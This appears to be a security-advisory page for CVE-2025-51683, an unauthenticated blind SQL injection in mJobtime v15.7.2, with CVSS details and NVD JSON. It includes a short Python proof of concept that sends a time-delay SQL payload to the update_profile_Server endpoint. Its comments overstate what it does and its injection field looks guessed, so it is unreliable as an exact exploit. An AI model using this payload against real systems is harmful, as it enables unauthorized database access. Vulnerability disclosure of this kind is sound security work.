Security Vulnerability Report
中文
CVE-2025-51683 CVSS 9.8 CRITICAL

CVE-2025-51683

Published: 2025-12-01 20:15:52
Last Modified: 2025-12-04 18:16:35

Description

A blind SQL Injection (SQLi) vulnerability in mJobtime v15.7.2 allows unauthenticated attackers to execute arbitrary SQL statements via a crafted POST request to the /Default.aspx/update_profile_Server endpoint .

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mjobtime:mjobtime:15.7.2:*:*:*:*:*:*:* - VULNERABLE
mJobtime < 15.7.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-51683 Blind SQL Injection PoC # Target: mJobtime v15.7.2 # Endpoint: /Default.aspx/update_profile_Server def exploit_blind_sqli(target_url, payload): """ Blind SQL Injection exploitation function payload: SQL injection payload to inject """ headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } # Prepare the malicious POST data data = { 'profile_field': payload # Injection point } try: response = requests.post( f'{target_url}/Default.aspx/update_profile_Server', data=data, headers=headers, timeout=30 ) return response except requests.exceptions.RequestException as e: print(f'Error: {e}') return None def extract_data(target_url): """ Example: Extract database version using time-based blind SQLi """ # Time-based blind SQLi payload to extract database version payload = "'; IF(1=1) WAITFOR DELAY '0:0:5'--" print(f'[*] Sending payload: {payload}') response = exploit_blind_sqli(target_url, payload) if response and response.elapsed.total_seconds() >= 5: print('[+] Injection successful! Database is vulnerable.') else: print('[-] Injection failed or target not vulnerable.') if __name__ == '__main__': if len(sys.argv) < 2: print(f'Usage: python {sys.argv[0]} <target_url>') print(f'Example: python {sys.argv[0]} http://target.com') sys.exit(1) target = sys.argv[1].rstrip('/') extract_data(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-51683", "sourceIdentifier": "[email protected]", "published": "2025-12-01T20:15:51.783", "lastModified": "2025-12-04T18:16:35.267", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A blind SQL Injection (SQLi) vulnerability in mJobtime v15.7.2 allows unauthenticated attackers to execute arbitrary SQL statements via a crafted POST request to the /Default.aspx/update_profile_Server endpoint ."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mjobtime:mjobtime:15.7.2:*:*:*:*:*:*:*", "matchCriteriaId": "DC0C873D-A6A8-4FB3-A7AC-07DBC8ED72A9"}]}]}], "references": [{"url": "http://mjobtime.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://labs.infoguard.ch/advisories/cve-2025-51682_cve-2025-51683_time_management_softare_sqli-rce/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}